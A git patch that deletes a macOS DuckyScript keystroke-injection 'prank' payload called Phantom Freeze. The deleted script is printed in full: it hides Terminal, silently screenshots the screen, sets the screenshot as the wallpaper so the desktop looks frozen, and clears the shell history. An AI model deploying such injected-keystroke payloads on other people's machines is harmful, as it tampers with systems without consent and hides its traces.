From 70c312764f987e037e73c0a82eab7ecb63539241 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Tue, 4 Jul 2023 15:31:50 -0500 Subject: [PATCH] Removed broken script Phantom freeze --- Pranks/Phantom Freeze.txt | 41 --------------------------------------- 1 file changed, 41 deletions(-) delete mode 100644 Pranks/Phantom Freeze.txt diff --git a/Pranks/Phantom Freeze.txt b/Pranks/Phantom Freeze.txt deleted file mode 100644 index 613c017..0000000 --- a/Pranks/Phantom Freeze.txt +++ /dev/null @@ -1,41 +0,0 @@ -REM Runs a command to hide the terminal application. -REM Change the location of screenshots to a temporary directory. -REM Kill and restart the SystemUIServer to apply the changes. -REM Capture a screenshot of the current screen silently (without making a camera sound). -REM Set the screenshot as the new wallpaper, effectively making the desktop look frozen. -REM Clear the terminal history and exit the terminal. - - -REM Title: Phantom Freeze -REM Author: Narsty -REM Target: MacOS -REM Version: 1.0 -REM Category: Prank - -DELAY 500 -GUI SPACE -DELAY 200 -STRING Terminal -DELAY 200 -ENTER -DELAY 1000 -STRING osascript -e 'tell application "System Events" to set visible of process "Terminal" to false' -ENTER -DELAY 200 -STRING defaults write com.apple.screencapture location /tmp/ -ENTER -DELAY 200 -STRING killall SystemUIServer -ENTER -DELAY 200 -STRING screencapture -x /tmp/ghost.png -ENTER -DELAY 200 -STRING osascript -e 'tell application "Finder" to set desktop picture to POSIX file "/tmp/ghost.png"' -ENTER -DELAY 200 -STRING history -c && exit -ENTER - - -